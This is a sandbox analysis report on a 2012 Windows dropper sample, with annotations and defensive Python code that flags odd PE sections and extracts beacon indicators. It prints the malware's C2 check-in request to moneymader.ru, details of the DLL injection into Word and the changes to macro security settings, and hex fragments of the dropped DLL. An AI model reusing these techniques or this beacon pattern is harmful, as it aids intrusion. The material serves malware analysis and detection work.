General Information

Analysis ID: 19541
Start time: 19:54:27
Start date: 09/09/2012
Overall analysis duration: 0h 6m 16s
Sample file name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
Cookbook file name: Long Wait.jbs
Analysis system description: XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Warnings:
  • Too many NtAllocateVirtualMemory calls (excessive behavior)
  • Too many NtUserMessageCall calls (excessive behavior)

Classification / Threat Score

(The per-category score bars were not preserved in this text export; only the category names remain.)
  • Persistence, Installation, Boot Survival
  • Hiding, Stealthiness, Detection and Removal Protection
  • Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection
  • Spreading
  • Exploiting
  • Networking
  • Data spying, Sniffing, Keylogging, Ebanking Fraud

Matching Signatures

  • Creates files inside the user directory
  • Creates temporary files
  • Printf formatting strings found in memory and binary data
  • Spawns processes
  • Urls found in memory or binary data
  • Creates an autostart registry key
  • Creates files inside the system directory
  • Creates mutexes:
      \BaseNamedObjects\Local\Mso97SharedDg19211106568_S-1-5-21-507921405-1960408961-839522115-500Mutex
      \BaseNamedObjects\Local\Mutex_MSOSharedMem
      \BaseNamedObjects\Local\Mso97SharedDg20321106568_S-1-5-21-507921405-1960408961-839522115-500Mutex
      \BaseNamedObjects\Local\Mso97SharedDg19521106568_S-1-5-21-507921405-1960408961-839522115-500Mutex
      \BaseNamedObjects\3408630516cb2b92f4
      \BaseNamedObjects\Local\SqmSysTray
    (The Mso97Shared*, Mutex_MSOSharedMem and SqmSysTray names are Office's own and appear because WINWORD.EXE is part of the analysed process tree; \BaseNamedObjects\3408630516cb2b92f4 is the one name that does not belong to Office.)
  • Deletes itself after installation
  • Downloads files from webservers via HTTP
  • Drops PE files
  • PE file contains sections with non-standard names
  • PE sections with suspicious entropy found
  • Performs DNS lookups
  • Injects DLLs into Windows application: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp -> C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
  • Maps a DLL or memory area into another process
  • Modifies Office VBOM (Visual Basic Object Model) security settings
  • Modifies Office macro security settings
  • Queues an APC in another process (thread injection)

Startup

  • system is xp
  • WINWORD.EXE (PID: 1680 MD5: 7A0FA3A0282B4630F3768A74441D4BAE)
    • svchost.exe (PID: 1744 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

The sample process itself (PID 1764, see System Behavior) is not part of this tree. WINWORD.EXE is the injection target named in the signatures, and the svchost.exe it spawns is the process in which the moneymader.ru URL is found and from which the HTTP request under Network Behavior is sent.

Created / dropped Files

  File Path | MD5
  C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp | 480AD1B1B4F71A6A1BE2F6FAC143A42A
  C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\VB11.pip | 3D04C6263F770B2AD9A980043230EBBE
  C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot | 05A02048D6F36640223C02FE5E3F1D00
  C:\WINDOWS\system32\hyli.igo | 480AD1B1B4F71A6A1BE2F6FAC143A42A
  C:\WINDOWS\system32\hyli.igo (copy) | 480AD1B1B4F71A6A1BE2F6FAC143A42A

72.tmp and hyli.igo carry the same MD5: the temp file is the dropped DLL (it is mapped as an image at 10000000 under Section Activities) and the CopyFileA record under File Activities places a copy of it in system32 under a name with a meaningless extension. VB11.pip and ~$Normal.dot are ordinary Word 2003 working files that appear once WINWORD.EXE is running.

Contacted Domains

  Name | IP | Name Server | Active | Registrar | e-Mail
  moneymader.ru | 88.214.232.128 | ns2.moneymader.ru, ns1.moneymader.ru | true | unknown | unknown

Contacted IPs

  IP | Country | Pingable | Open Ports
  88.214.232.128 | UNITED KINGDOM | true | 21, 80
  195.186.1.121 | SWITZERLAND | false |
  195.186.4.121 | SWITZERLAND | false |

Static File Info

File type: PE32 executable (GUI) Intel 80386, for MS Windows
File name: New_password-1eb4cd066eb69b63e74387a82443d998.exe
File size: 42496
MD5: 1eb4cd066eb69b63e74387a82443d998
SHA1: a90832f0e6649426875d1916cfe606a042b354aa
SHA256: e52a9808521c1ed027c2c8bca232646f4634455a8b226c9812f1fe2fcd0a6d0f
SHA512: f4533d959b6c787a8a14370eb5f4ac5afffae47529838f65269206f48227e7fd778702736fa1928df902a165dc542b086ddf03f0fcb7fe02d8793d5f23812b71

Static PE Info

General
  Entrypoint: 0x4010b0
  Entrypoint Section: .text
  Imagebase: 0x400000
  Subsystem: windows gui
  Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
  DLL Characteristics: TERMINAL_SERVER_AWARE, NO_SEH
  Time Stamp: 0x4C92075C [Thu Sep 16 12:02:36 2010 UTC]
  TLS Callbacks: none listed

Resources
  Name | RVA | Size | Type | Language | Country
  RT_ICON | 0xe518 | 0xea8 | data | English | United States
  RT_DIALOG | 0xf3d8 | 0x2e | data | English | United States
  RT_GROUP_ICON | 0xf3c0 | 0x14 | MS Windows icon resource - 1 icon | English | United States
  RT_VERSION | 0xe190 | 0x14c | 80386 COFF executable not stripped - version 79 | English | United States
  RT_MANIFEST | 0xe2e0 | 0x232 | XML document text | English | United States

Imports
  DLL | Imported functions
  KERNEL32.dll | GetModuleHandleA, GetProcAddress, GetCommandLineA, CloseHandle, VirtualAlloc, lstrcpyA, LoadLibraryA

  Seven imports, among them LoadLibraryA, GetProcAddress and VirtualAlloc, is the profile of a loader stub that resolves its real imports at run time. The execute-and-write allocations at 350000/370000 under Memory Activities and the 35xxxx source addresses under Section Activities are consistent with code being unpacked into fresh memory and run from there.

Sections
  Name | Virtual Address | Virtual Size | Raw Size | Entropy
  .text | 0x1000 | 0xc98 | 0xe00 | 5.60291887063
  .data | 0x2000 | 0x72d0 | 0x7400 | 5.44666449829
  .data0 | 0xa000 | 0x18 | 0x200 | 0.322488410335
  .data1 | 0xb000 | 0x18 | 0x200 | 0.335736224849
  .data2 | 0xc000 | 0x18 | 0x200 | 0.322488410335
  .data3 | 0xd000 | 0x18 | 0x200 | 0.322488410335
  .rsrc | 0xe000 | 0x1408 | 0x1600 | 5.4089687542
  .reloc | 0x10000 | 0x164 | 0x200 | 3.09199427013

  The four .dataN sections are what trips the "non-standard names" and "suspicious entropy" signatures: each holds 0x18 bytes of content in a 0x200-byte raw block, so the entropy is close to zero.

Version Infos
  Description | Data
  FileVersion | 00.4.9.96
  ProductVersion | 8.69.82.36
  Translation | 0x0804 0x0000

Possible Origin
  Language of compilation system | Country where language is spoken | Map
  English | United States | (not preserved)
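Added example (not part of the sandbox output): the heuristics behind the two section signatures, implemented in Python and run over the Sections table above. The Shannon entropy routine is the standard per-byte measure; the name list and thresholds are this example's own assumptions, not the sandbox's rules.

```python
import math

# Section names mainstream compilers and linkers emit. This list and the
# thresholds below are assumptions of this example, not the sandbox's rules.
STANDARD_SECTION_NAMES = {
    ".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc",
    ".tls", ".pdata", ".xdata", ".CRT", ".debug", ".sdata", ".sbss",
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def section_findings(sections, high=7.0, low=1.0):
    """
    sections: iterable of (name, virtual_size, raw_size, entropy) as in the report.
    Returns {name: [reasons]} for every section that deserves a closer look.
    """
    findings = {}
    for name, vsize, rsize, entropy in sections:
        reasons = []
        if name not in STANDARD_SECTION_NAMES:
            reasons.append("non-standard name")
        if entropy >= high:
            reasons.append("high entropy: packed or encrypted content")
        if entropy < low and name != ".bss" and rsize:
            reasons.append("near-zero entropy: mostly padding")
        if rsize and vsize * 4 < rsize:
            reasons.append("virtual size far below raw size: file-only filler")
        if rsize == 0 and vsize:
            reasons.append("no raw data but virtual size: filled at run time")
        if reasons:
            findings[name] = reasons
    return findings


# Rows transcribed from the Sections table above (name, VirtualSize, RawSize, entropy).
REPORT_SECTIONS = [
    (".text",  0x0c98, 0x0e00, 5.60291887063),
    (".data",  0x72d0, 0x7400, 5.44666449829),
    (".data0", 0x0018, 0x0200, 0.322488410335),
    (".data1", 0x0018, 0x0200, 0.335736224849),
    (".data2", 0x0018, 0x0200, 0.322488410335),
    (".data3", 0x0018, 0x0200, 0.322488410335),
    (".rsrc",  0x1408, 0x1600, 5.4089687542),
    (".reloc", 0x0164, 0x0200, 3.09199427013),
]

if __name__ == "__main__":
    # Constructed section body: 24 distinct bytes followed by zero padding to
    # 0x200, the shape the .dataN sections have; entropy lands under 1 bit/byte.
    filler = bytes(range(24)) + b"\x00" * (0x200 - 24)
    print(f"entropy of constructed filler section: {shannon_entropy(filler):.3f}")
    for name, reasons in section_findings(REPORT_SECTIONS).items():
        print(f"{name:7s} {'; '.join(reasons)}")
```

Only the four .dataN sections are returned; .text, .data, .rsrc and .reloc pass every check, which matches the signatures firing on names and entropy but not on packing.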

String Analysis

Formattings for printf style functions
  Source | String value
  svchost.exe | %SystemRoot%\System32\mswsock.dll
  svchost.exe | %s\%s\%s\%s\%s
  svchost.exe | |%SystemRoot%\system32\rsvpsp.dll
  hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr | %v Omd "%u"(EyBdo w CU Vtxlqk) Cu Ootj
  svchost.exe | Pw%n[w
  svchost.exe | %ls %ls
  svchost.exe | %SystemRoot%\Debug\UserMode\userenv.bak
  New_password-1eb4cd066eb69b63e74387a82443d998.exe | %systemroot%\system32\com\dmp
  hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr | uxrfno38.hai %u cwknqw
  svchost.exe | %s\%s\%s\%s\%s\%s
  New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe | Assertion failed: %s, file %s, line %d
  svchost.exe | %d %d %d %d
  svchost.exe | %SystemRoot%\Debug\UserMode\userenv.log
  New_password-1eb4cd066eb69b63e74387a82443d998.exe | IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3
  svchost.exe | %SystemRoot%\system32\rsvpsp.dll
  New_password-1eb4cd066eb69b63e74387a82443d998.exe | %systemroot%\Registration
  svchost.exe | %SystemRoot%\System32\winrnr.dll
  hyli.igo0.dr, 72.tmp.dr, hyli.igo.dr | JHX /%u %u%v %s
  svchost.exe | %SystemRoot%\system32\mswsock.dll
  New_password-1eb4cd066eb69b63e74387a82443d998.exe, svchost.exe | DragDrop%lx
URLs
  Source | String value
  svchost.exe | http://moneymader.ru/group/mixer/bb.php
  WINWORD.EXE | http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang%
  WINWORD.EXE | http://officeupdate.microsoft.com
  WINWORD.EXE | http://schemas.microsoft.com/sharepoint/soap/directory/
  WINWORD.EXE | http://schemas.xmlsoap.org/soap/envelope/
  WINWORD.EXE | http://www.w3.org/2001/xmlschema
  WINWORD.EXE | http://www.w3.org/2001/xmlschema-instance
  WINWORD.EXE | https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang%
  WINWORD.EXE | https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang%

  The WINWORD.EXE entries are Office's own built-in URLs. The only URL attributable to the sample is the moneymader.ru one, found in the svchost.exe process.

Network Behavior

TCP Packets
  Timestamp | Source Port | Dest Port | Source IP | Dest IP
  Sep 9, 2012 19:57:50.692679882 CEST | 1039 | 80 | 192.168.0.10 | 88.214.232.128
  Sep 9, 2012 19:57:50.692706108 CEST | 80 | 1039 | 88.214.232.128 | 192.168.0.10
  Sep 9, 2012 19:57:50.693042994 CEST | 1039 | 80 | 192.168.0.10 | 88.214.232.128
  Sep 9, 2012 19:57:50.693845034 CEST | 1039 | 80 | 192.168.0.10 | 88.214.232.128
  Sep 9, 2012 19:57:50.693859100 CEST | 80 | 1039 | 88.214.232.128 | 192.168.0.10
  Sep 9, 2012 19:57:51.466325998 CEST | 80 | 1039 | 88.214.232.128 | 192.168.0.10
  Sep 9, 2012 19:57:51.467135906 CEST | 1039 | 80 | 192.168.0.10 | 88.214.232.128
  Sep 9, 2012 19:57:51.467197895 CEST | 80 | 1039 | 88.214.232.128 | 192.168.0.10
  Sep 9, 2012 19:57:51.467570066 CEST | 1039 | 80 | 192.168.0.10 | 88.214.232.128

UDP Packets
  Timestamp | Source Port | Dest Port | Source IP | Dest IP
  Sep 9, 2012 19:57:49.265110970 CEST | 61120 | 53 | 192.168.0.10 | 195.186.1.121
  Sep 9, 2012 19:57:50.264120102 CEST | 61120 | 53 | 192.168.0.10 | 195.186.4.121
  Sep 9, 2012 19:57:50.673702002 CEST | 53 | 61120 | 195.186.4.121 | 192.168.0.10
  Sep 9, 2012 19:57:50.761223078 CEST | 53 | 61120 | 195.186.1.121 | 192.168.0.10

ICMP Packets
  Timestamp | Source IP | Dest IP | Checksum | Code | Type
  Sep 9, 2012 19:57:50.761780977 CEST | 192.168.0.10 | 195.186.1.121 | 832b | Port unreachable | Destination Unreachable

DNS Queries
  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
  Sep 9, 2012 19:57:49.265110970 CEST | 192.168.0.10 | 195.186.1.121 | 0x2cd5 | Standard query (0) | moneymader.ru | A (IP address) | IN (0x0001)
  Sep 9, 2012 19:57:50.264120102 CEST | 192.168.0.10 | 195.186.4.121 | 0x2cd5 | Standard query (0) | moneymader.ru | A (IP address) | IN (0x0001)

DNS Answers
  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
  Sep 9, 2012 19:57:50.673702002 CEST | 195.186.4.121 | 192.168.0.10 | 0x2cd5 | No error (0) | moneymader.ru | | 88.214.232.128 | A (IP address) | IN (0x0001)
  Sep 9, 2012 19:57:50.761223078 CEST | 195.186.1.121 | 192.168.0.10 | 0x2cd5 | No error (0) | moneymader.ru | | 88.214.232.128 | A (IP address) | IN (0x0001)

  The DNS traffic is an ordinary resolver retry, not a second lookup: the same transaction ID 0x2cd5 goes to 195.186.1.121, is re-sent to 195.186.4.121 a second later when no answer has arrived, and the answer from 195.186.4.121 is used. The late answer from 195.186.1.121 reaches a port that is already closed, which is what the ICMP port-unreachable message a fraction of a millisecond later is about.

HTTP Request Dependency Graph
  • moneymader.ru

HTTP Packets
  Request, Sep 9, 2012 19:57:50.693845034 CEST, 192.168.0.10:1039 -> 88.214.232.128:80 (0 KB transferred):
    GET /group/mixer/bb.php?v=200&id=436373810&b=16sentab&tm=24 HTTP/1.1
    User-Agent: Opera\9.64
    Host: moneymader.ru

  Response, Sep 9, 2012 19:57:51.466325998 CEST, 88.214.232.128:80 -> 192.168.0.10:1039 (1 KB transferred):
    HTTP/1.1 404 Not Found
    Date: Sun, 09 Sep 2012 17:57:51 GMT
    Server: Apache/1.3.42 (Unix) PHP/5.2.17
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1

  The check-in got a 404 at analysis time, so the "Downloads files from webservers via HTTP" signature is triggered by the request alone; no payload was retrieved during this run. The User-Agent "Opera\9.64" uses a backslash where a product token takes a slash, which, together with the /group/mixer/bb.php?v=&id=&b=&tm= request pattern, is the most specific network indicator in the report.
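Added example (not part of the sandbox output): a small Python parser that takes the captured check-in request as printed above, extracts the fields a detection engineer would turn into indicators, and checks the User-Agent against the product-token grammar of RFC 7231. The request text is transcribed from the report with the header lines re-split; the indicator layout is this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The check-in request as printed in the report (header lines re-split).
CAPTURED_REQUEST = (
    "GET /group/mixer/bb.php?v=200&id=436373810&b=16sentab&tm=24 HTTP/1.1\r\n"
    "User-Agent: Opera\\9.64\r\n"
    "Host: moneymader.ru\r\n"
    "\r\n"
)

# RFC 7231 product token: tchar+ optionally followed by "/" and a version of tchar+.
_TCHAR = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
PRODUCT_TOKEN = re.compile(rf"^{_TCHAR}(/{_TCHAR})?$")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, query and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query_string": parts.query,
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "version": version,
        "headers": headers,
        "body": body,
    }


def user_agent_is_malformed(ua: str) -> bool:
    """True when any User-Agent token (comments removed) is not an RFC 7231 product token."""
    without_comments = re.sub(r"\([^)]*\)", " ", ua)
    return any(not PRODUCT_TOKEN.match(tok) for tok in without_comments.split())


def beacon_indicators(req: dict) -> dict:
    """Distil the fields worth turning into IOCs or a network rule."""
    host = req["headers"].get("host", "")
    ua = req["headers"].get("user-agent", "")
    qs = req["query_string"]
    return {
        "url": f"http://{host}{req['path']}" + (f"?{qs}" if qs else ""),
        "host": host,
        "path": req["path"],
        "query_keys": sorted(req["query"]),
        "bot_id": req["query"].get("id"),
        "user_agent": ua,
        "user_agent_malformed": user_agent_is_malformed(ua),
    }


if __name__ == "__main__":
    for key, value in beacon_indicators(parse_http_request(CAPTURED_REQUEST)).items():
        print(f"{key:22s} {value}")
```

The malformed-UA check is deliberately grammar-based rather than a string match, so it also catches other broken product tokens while leaving ordinary browser strings with parenthesised comments alone.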

Code Manipulation Behavior

System Behavior

General
  Start time: 09:39:48
  Start date: 24/01/2012
  Path: C:\New_password-1eb4cd066eb69b63e74387a82443d998.exe
  Wow64 process (32bit): false
  Commandline: unknown
  Imagebase: 0x400000
  File size: 42496 bytes
  MD5 hash: 1EB4CD066EB69B63E74387A82443D998

  The process-level clock (09:39:48, 24/01/2012, also used by the memory-usage samples below) does not match the analysis start in General Information (19:54:27, 09/09/2012) or the packet timestamps (Sep 9, 2012 19:57); treat the per-process timestamps in this export as unreliable.

File Activities

Files opened
  File Path | Access | Options | Content overwritten | Completion | Count | Source Address | Symbol
  C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp | read attributes and synchronize and generic write | synchronous io non alert and non directory file | true | success or wait | 1 | 40235C | CreateFileA
  C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp | read attributes and synchronize and generic read | sequential only and synchronous io non alert and non directory file and open reparse point | true | success or wait | 1 | 1000116C | CopyFileA
  C:\WINDOWS\system32\hyli.igo | read attributes and delete and synchronize and generic write | sequential only and synchronous io non alert and non directory file | true | success or wait | 1 | 1000116C | CopyFileA

Files created
  File Path | Access | Attributes | Options | Completion | Count | Source Address | Symbol
  C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp | read attributes and synchronize and generic read | normal | synchronous io non alert and non directory file | success or wait | 1 | 4022D9 | GetTempFileNameA

Files copied
  Old File Path | New File Path | Completion | Count | Source Address | Symbol
  C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp | C:\WINDOWS\system32\hyli.igo | success or wait | 1 | 1000116C | CopyFileA

Files written (each row shows the first bytes of one 1024-byte write; the 72.tmp writes all come from the sample's own code at 40184F, the copy to system32 from the DLL at 1000116C)
File Path Offset Length Value Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 55 89 E5 53 83 EC 44 C6 45 F5 25 C6 45 F6 78 C6 45 F3 25 C6 45 F4 75 C6 45 F7 00 C7 44 24 0C F4 92 2B CB C7 44 24 08 F4 92 2B CB 8D 45 F3 89 44 24 04 8D 5D D3 89 1C 24 FF 15 8C 82 00 10 89 5C 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 FF 15 2C 82 00 10 83 EC 0C 89 C3 FF 15 7C 82 00 10 3D B7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 C7 04 24 0E 00 00 00 E8 50 21 00 00 84 C0 75 08 8D 65 F4 5B 5E 5F C9 C3 8B 1D EC 82 00 10 09 F3 8D BD A0 FD FF FF 89 7C 24 04 C7 04 24 0C 00 00 00 E8 4A 35 00 00 8B 15 8C 82 00 10 89 95 90 FD FF FF A1 EC 82 00 10 B1 64 D3 F8 89 FA 29 C2 89 D0 83 C0 64 89 44 24 04 C7 04 24 0B 00 00 00 E8 1C 35 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E4 00 00 00 80 BD 87 EB FF FF 00 0F 84 C3 00 00 00 85 C0 7E 42 31 F6 EB 28 8D 76 00 A1 EC 82 00 10 B1 E8 D3 F8 89 DA 29 C2 01 D6 C7 04 24 E8 03 00 00 FF 15 80 82 00 10 51 39 B5 B4 EB FF FF 7E 16 E8 EE 17 00 00 83 F8 02 75 D1 A1 EC 82 00 10 8D 3C 85 02 00 00 00 83 FF 02 0F 84 AA 00 00 00 C7 04 24 01 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 B5 F0 FC FF FF B1 96 F3 A5 89 04 24 FF 15 6C 82 00 10 50 8D 85 48 FF FF FF 89 44 24 04 C7 04 24 00 00 00 00 E8 57 2D 00 00 8D 55 C8 89 54 24 08 C7 44 24 04 04 00 00 00 89 04 24 E8 BC FD FF FF C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 45 D8 00 00 00 00 C7 45 DC 00 00 00 00 8B 85 E0 FC FF FF 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 74 3A 39 F2 77 22 8D 41 04 8D 76 00 39 C2 76 0E 89 C1 80 39 3A 74 D1 8D 41 01 39 C2 77 F2 31 C0 5B 5E 5F C9 C3 8D 76 00 89 F0 66 90 40 80 38 2F 74 0C 39 C2 77 F6 8D 46 01 EB D1 90 89 F0 39 C2 76 F4 C6 00 00 8D 78 01 8A 40 01 3C 0D 74 21 3C 0A 74 1D 39 FA 76 DF 89 F9 8D 76 00 41 8A 01 3C 0D 74 0F 3C success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 04 24 FF 15 A8 82 00 10 83 EC 10 85 C0 74 66 01 C3 85 DB 7F 9A EB C9 84 C9 74 AD 89 F2 84 D2 75 07 BE 01 00 00 00 EB A0 47 74 B0 8D 45 E4 89 44 24 08 89 7C 24 04 8D 95 E0 F7 FF FF 89 14 24 E8 8B FB FF FF 85 C0 0F 85 3B 01 00 00 80 3F 3C 74 24 8B 55 14 C6 02 00 8D 85 E0 F7 FF FF 89 44 24 04 C7 04 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 5C 24 04 89 04 24 FF 15 C0 82 00 10 83 EC 24 8B 45 F4 8B 5D FC C9 C3 90 55 89 E5 57 56 53 81 EC AC 00 00 00 8B 75 0C 8B 7D 10 8B 45 08 89 04 24 E8 5B FF FF FF 89 C3 85 C0 74 61 85 FF 74 14 8D 85 68 FF FF FF 89 44 24 04 89 3C 24 E8 8B 1F 00 00 89 C6 8B 45 1C 89 44 24 14 8B 45 18 89 44 24 10 8B 45 14 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 24 FF 15 A8 82 00 10 83 EC 10 89 85 E4 F7 FF FF C6 84 05 E8 F7 FF FF 00 85 C0 7E 36 89 C2 4A 31 FF 31 F6 8D 85 E8 F7 FF FF 89 D9 89 F3 89 CE EB 12 8D 76 00 80 F9 0A 74 43 31 FF 31 DB 85 D2 74 0F 40 4A 8A 08 80 F9 0D 75 EA B3 01 85 D2 75 F1 89 F3 8B 55 08 C7 82 4C 09 00 00 00 00 00 00 89 1C 24 FF 15 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 00 C7 44 24 14 04 00 00 00 8D 55 08 89 54 24 10 C7 44 24 0C 04 00 00 00 89 5C 24 08 C7 44 24 04 00 00 00 00 89 04 24 E8 EC F7 FF FF 83 C4 24 5B C9 C3 66 90 55 89 E5 53 83 EC 34 C7 45 F4 00 00 00 00 C7 04 24 14 00 00 00 E8 66 17 00 00 89 C3 C7 04 24 12 00 00 00 E8 58 17 00 00 C7 44 24 14 04 00 00 00 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 10 75 E6 8B 45 08 C7 80 24 08 00 00 01 00 00 00 C7 80 48 08 00 00 00 00 00 00 C7 44 24 04 10 50 00 10 83 C0 14 89 04 24 FF 15 EC 81 00 10 83 EC 08 8B 55 08 80 7A 05 00 75 48 8B 82 24 08 00 00 EB 20 66 90 8B 5D 08 8B 83 24 08 00 00 89 C2 C1 E2 07 01 C2 80 7C 13 14 00 74 27 40 89 83 24 08 00 00 89 44 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 8B 55 0C 89 54 24 04 89 04 24 FF 15 FC 81 00 10 83 EC 08 85 C0 0F 94 C0 8D 65 F8 5E 5F C9 C3 90 55 89 E5 57 56 53 83 EC 6C 8B 55 0C 80 3A 3A 74 1F 3B 55 10 73 10 89 D6 8B 45 10 90 46 80 3E 3A 74 10 39 F0 77 F6 83 C4 6C 5B 5E 5F C9 C3 66 90 89 D6 39 75 10 76 EF A1 20 80 00 10 85 C0 74 E6 89 F7 29 D7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 E8 7B 0D 00 00 89 44 24 04 89 34 24 FF 95 64 FE FF FF 83 EC 08 8A 03 84 C0 0F 84 91 00 00 00 31 C9 8D 76 00 8D 50 D0 80 FA 09 77 0A 8D 14 89 0F BE C0 8D 4C 50 D0 43 8A 03 84 C0 75 E7 83 F9 77 7E 6E 8D 5D B0 89 5C 24 04 C7 04 24 1A 00 00 00 E8 2B 0D 00 00 8D 45 E0 89 44 24 20 8D 45 E4 89 44 24 1C C7 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 51 04 00 00 A1 E0 81 00 10 E8 7A FA FF FF C7 04 24 88 13 00 00 FF 15 80 82 00 10 51 8D 4D E0 8D 55 E4 89 F8 E8 47 FB FF FF E9 19 FF FF FF 66 90 8D 45 A0 89 44 24 08 C7 44 24 04 00 00 00 00 C7 04 24 00 00 00 00 B9 01 00 00 00 BA 0E 00 00 00 8B 45 A8 E8 30 FA FF FF 85 C0 0F 85 6B FF FF FF 8B 45 A8 85 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 89 7C 24 0C C7 44 24 08 00 00 00 00 8B 85 64 FF FF FF 89 44 24 04 8B 02 89 04 24 89 95 5C FF FF FF E8 96 00 00 00 89 03 89 7C 24 04 8B 85 64 FF FF FF 89 04 24 E8 8A 05 00 00 83 EC 08 89 03 83 C3 04 8B 95 5C FF FF FF 83 C2 04 46 8B 85 60 FF FF FF 39 34 C5 20 52 00 10 7F A5 89 D6 FF 85 60 FF FF FF 83 success or wait 1 40184F WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\72.tmp unknown 1024 84 C0 0F 84 70 01 00 00 8B 7D 0C C7 45 E8 00 00 00 00 66 90 FF 45 08 85 DB 0F 84 45 01 00 00 B8 61 00 00 00 31 D2 F7 75 EC 38 45 F3 0F 8D B6 00 00 00 66 90 B8 41 00 00 00 88 D9 D3 E8 38 45 F3 0F 8C CA 00 00 00 80 7D F3 5A 0F 8F C0 00 00 00 89 D8 B1 5A D3 E0 8D 48 5A 88 4D E7 BA 41 00 00 00 BE 41 00 success or wait 1 40184F WriteFile
